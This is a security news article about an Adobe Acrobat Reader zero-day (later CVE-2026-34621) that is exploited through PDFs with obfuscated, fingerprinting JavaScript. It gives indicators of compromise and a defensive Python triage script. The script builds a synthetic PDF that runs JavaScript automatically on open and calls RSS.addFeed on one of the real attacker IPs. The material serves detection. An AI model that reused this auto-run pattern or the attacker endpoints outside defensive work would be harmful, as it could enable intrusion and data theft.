Security researcher Haifei Li has uncovered that unidentified attackers have been exploiting a zero-day vulnerability in Adobe Acrobat Reader since November 2025, and potentially even earlier.
Exploits embedded in PDF files
Li, who is among the developers of EXPMON, a cybersecurity tool that identifies sophisticated file-based exploits by examining suspicious files through its public web interface or API, shared insights about the issue.
“Just a few weeks ago, on March 26, an individual submitted a PDF file to EXPMON, which was named ‘yummy_adobe_exploit_uwu.pdf’ by the anonymous submitter. This file activated one of EXPMON’s advanced detection features,” Li explained in a post released on Tuesday.
The same PDF had been submitted earlier to VirusTotal, according to Li. Another security researcher noted a variant of the file on VirusTotal, which was first submitted on November 28, 2025.
Upon examining the initial PDF, Li found that when opened, it attempts to run heavily obfuscated JavaScript code contained within the file.
This script gathers various details from the host system, including language settings, operating system version, Adobe Reader version number, and the local path of the PDF. It then transmits this information to a remote server controlled by the attacker.
Additionally, the script can retrieve further exploits from the attacker's server and execute them, such as a remote code execution stage or a sandbox escape. During his analysis, however, Li found that the server did not deliver any exploits.
“This could result from various factors, such as the attacker’s server blocking my IP address, or it may require specific local information to meet the server's conditions. This resembles a sophisticated fingerprinting attack,” he noted.
Testing confirmed that the remote server is capable of delivering and executing additional exploits (Source: Haifei Li)
Malware analyst Giuseppe Massaro examined both PDF samples and observed that they feature Russian-language documents presented as images, serving as visual decoys. The content, which relates to gas supply disruptions and emergency responses, indicates that the attackers likely targeted Russian-speaking individuals, particularly in government, energy, or infrastructure sectors.
Recommended precautions until a fix is available
Li stated that the malicious PDF files trigger the exploit as soon as they are opened, and confirmed that it works against the latest Acrobat Reader release available at the time of his analysis.
He has informed Adobe about his findings, but the company has not yet released security updates to address the vulnerability.
In the interim, users are advised not to open PDF files from unknown sources. Security teams can block the IP addresses of the two attacker-controlled servers, 169.40.2.68 and 188.214.34.20. Ideally, as Li suggested, they should also block all HTTP/HTTPS traffic whose User-Agent header contains the string "Adobe Synchronizer". Note that this User-Agent belongs to Acrobat's own collaboration synchronizer (AdobeCollabSync.exe), so blocking it also cuts off that component's legitimate traffic; the trade-off is acceptable while no patch exists, but expect collaboration features to break.
Massaro recommended that security teams monitor endpoints for specific behaviors, such as AdobeCollabSync.exe making external network connections, and PDF JavaScript invoking the RSS.addFeed() or util.readFileIntoStream() APIs.
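The indicators above (the two server IPs and the two Acrobat JavaScript APIs) can be turned into a first-pass triage script for PDFs sitting in a mail quarantine or a submissions folder. The following is an added example written for this article, not code from Li, Massaro, EXPMON, or Adobe. It inflates FlateDecode streams, pulls out literal /JS strings, and reports which indicators appear; the sample PDF it builds is constructed for the demonstration and is not one of the files discussed in the article.

```python
import re
import zlib

# Indicators quoted in the article: the attacker-controlled IPs and the two
# Acrobat JavaScript APIs Massaro suggested watching for.
IOC_IPS = (b"169.40.2.68", b"188.214.34.20")
SUSPICIOUS_APIS = (b"RSS.addFeed", b"util.readFileIntoStream")

# A stream object: a flat dictionary (no nested << >>) followed by stream...endstream.
_STREAM_RE = re.compile(rb"<<([^<>]*?)>>\s*stream\r?\n(.*?)\r?\nendstream", re.S)
# A literal JavaScript string, e.g. /JS (app.alert(1)). Escaped parens are tolerated.
_JS_LITERAL_RE = re.compile(rb"/JS\s*\((.*?)(?<!\\)\)", re.S)


def iter_script_bodies(pdf: bytes):
    """Yield candidate script bodies: literal /JS (...) strings and all stream
    contents, inflated when the stream dictionary declares /FlateDecode."""
    for m in _JS_LITERAL_RE.finditer(pdf):
        yield m.group(1)
    for m in _STREAM_RE.finditer(pdf):
        dict_bytes, body = m.group(1), m.group(2)
        if b"/FlateDecode" in dict_bytes:
            try:
                body = zlib.decompress(body)
            except zlib.error:
                pass  # corrupt or deliberately broken stream: scan the raw bytes
        yield body


def triage(pdf: bytes) -> dict:
    """Return which article indicators appear in the file and whether it runs
    JavaScript automatically on open (/OpenAction pointing at a /JavaScript action)."""
    apis, ips = set(), set()
    for body in iter_script_bodies(pdf):
        apis.update(a.decode() for a in SUSPICIOUS_APIS if a in body)
        ips.update(i.decode() for i in IOC_IPS if i in body)
    # A C2 address can also sit outside any script (e.g. in a /URI action).
    ips.update(i.decode() for i in IOC_IPS if i in pdf)
    return {
        "openaction_js": bool(re.search(rb"/OpenAction\b", pdf)) and b"/JavaScript" in pdf,
        "apis": sorted(apis),
        "ips": sorted(ips),
    }


def verdict(report: dict) -> str:
    """Collapse a triage report into a queue label for an analyst."""
    if report["apis"] or report["ips"]:
        return "suspicious"
    return "review" if report["openaction_js"] else "clean"


def build_sample_pdf(js: bytes) -> bytes:
    """Construct a minimal PDF whose OpenAction runs Flate-compressed JavaScript.
    This is a synthetic file for the demo, not a sample from the wild."""
    compressed = zlib.compress(js)
    return b"".join([
        b"%PDF-1.7\n",
        b"1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 3 0 R >> endobj\n",
        b"2 0 obj << /Type /Pages /Kids [] /Count 0 >> endobj\n",
        b"3 0 obj << /S /JavaScript /JS 4 0 R >> endobj\n",
        b"4 0 obj << /Length %d /Filter /FlateDecode >>\nstream\n" % len(compressed),
        compressed, b"\nendstream\nendobj\n",
        b"trailer << /Root 1 0 R >>\n%%EOF\n",
    ])


# Constructed script mimicking the indicators named in the article (fingerprint
# fields plus the two API calls); it is not the real exploit's code.
SAMPLE_JS = (
    b"var fp = {lang: app.language, os: app.platform, ver: app.viewerVersion, path: this.path};\n"
    b"RSS.addFeed('http://169.40.2.68/feed.xml');\n"
    b"util.readFileIntoStream('/tmp/stage2');\n"
)

if __name__ == "__main__":
    report = triage(build_sample_pdf(SAMPLE_JS))
    print(verdict(report), report)
```

String matching is a triage aid, not a detector: the script in the real samples is heavily obfuscated, and an API name assembled at runtime (for example from concatenated fragments) will not appear in the inflated bytes. Files labelled "review" still warrant a look, and the endpoint telemetry Massaro describes covers the runtime case this script cannot.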
We have contacted Adobe for further details and will update this article upon receiving a response from them.
UPDATE (April 12, 2026, 04:20 a.m. ET):
Adobe has assigned CVE-2026-34621 to the identified vulnerability and has issued security updates for Acrobat DC, Acrobat Reader DC, and Acrobat 2024, applicable to both Windows and macOS.
“Successful exploitation of this issue could lead to arbitrary code execution,” the company confirmed.